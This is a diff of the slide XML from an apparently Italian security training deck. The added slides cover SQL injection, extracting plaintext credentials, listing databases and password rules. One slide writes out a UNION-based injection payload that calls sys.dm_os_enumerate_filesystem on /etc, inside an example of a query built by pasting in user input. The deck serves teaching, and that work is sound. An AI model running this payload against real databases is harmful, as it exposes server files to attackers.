+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' UNION ALL SELECT NULL, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>full_filesystem_path</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, NULL, NULL, NULL, NULL FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>sys.dm_os_enumerate_filesystem</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>('/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>etc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>','*.*') ORDER BY 2--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2131889864"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide31.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -20917,7 +21832,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide31.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide32.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21260,7 +22175,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide32.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide33.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21603,7 +22518,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide33.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide34.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21722,10 +22637,10 @@
       </p:pic>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="3" name="Picture 2" descr="A pair of handcuffs on a black background&#10;&#10;AI-generated content may be incorrect.">
+          <p:cNvPr id="4" name="Picture 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18912161-9C4B-91DC-0973-35DD06817AE0}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D755FCC-4ABD-00BB-6CC0-DD380C12BD24}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -21742,8 +22657,8 @@
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3580702" y="2199023"/>
-            <a:ext cx="1982595" cy="1982595"/>
+            <a:off x="1688631" y="2027670"/>
+            <a:ext cx="5766738" cy="2180183"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -21763,7 +22678,197 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide34.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide35.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B9B7C7E-CFB0-1A67-52EC-00BE10D91F19}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C420A99-8D1E-F15B-3A68-9B6CFDA4F5A4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Estrarre</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> le </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>credenziali</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> in </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>chiaro</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> da uno script</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6B3B25B-C446-2F2F-4DCF-87F45774B230}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="Picture 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CFB3EA5-5B3F-5E47-D8A7-457F41FAABD7}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1688631" y="2027670"/>
+            <a:ext cx="5766738" cy="2180183"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="2" name="Picture 1" descr="A pair of handcuffs on a black background&#10;&#10;AI-generated content may be incorrect.">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E8B240-5C2C-E519-A89D-434A5EE7E3C5}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId5"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3580702" y="2225258"/>
+            <a:ext cx="1982595" cy="1982595"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4244016731"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide36.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -22138,7 +23243,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide35.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide37.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -22195,7 +23300,7 @@
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Recuperare</a:t>
+              <a:t>Elencare</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -22215,7 +23320,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> database del server</a:t>
+              <a:t> database</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -22499,7 +23604,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide36.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide38.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -22842,7 +23947,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide37.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide39.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -23185,7 +24290,236 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide38.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 118"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="119" name="Google Shape;119;p30"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2472833" y="1497613"/>
+            <a:ext cx="4198334" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" dirty="0"/>
+              <a:t>Una buona password…</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="120" name="Google Shape;120;p30"/>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="121" name="Google Shape;121;p30"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2182797"/>
+            <a:ext cx="6887100" cy="2243867"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+              <a:buFont typeface="Barlow Condensed"/>
+              <a:buChar char="●"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0"/>
+              <a:t>8+ </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
+              <a:t>caratteri</a:t>
+            </a:r>
+            <a:endParaRPr sz="1600" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+              <a:buFont typeface="Barlow Condensed"/>
+              <a:buChar char="●"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" sz="1600" dirty="0"/>
+              <a:t>Lettere minuscole e maiuscole</a:t>
+            </a:r>
+            <a:endParaRPr sz="1600" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+              <a:buChar char="●"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" sz="1600" dirty="0"/>
+              <a:t>Numeri</a:t>
+            </a:r>
+            <a:endParaRPr sz="1600" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="0" indent="-330200">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+              <a:buChar char="●"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
+              <a:t>Caratteri</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
+              <a:t>speciali</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1600" dirty="0"/>
+            </a:br>
+            <a:endParaRPr sz="1600" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FF0000"/>
+              </a:solidFill>
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide40.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -23250,7 +24584,15 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Una query semplice </a:t>
+              <a:t>Una query </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>innocua</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -23353,7 +24695,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide39.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide41.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -23410,7 +24752,15 @@
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Una query semplice </a:t>
+              <a:t>Una query </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>innocua</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -23663,236 +25013,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 118"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="119" name="Google Shape;119;p30"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2472833" y="1497613"/>
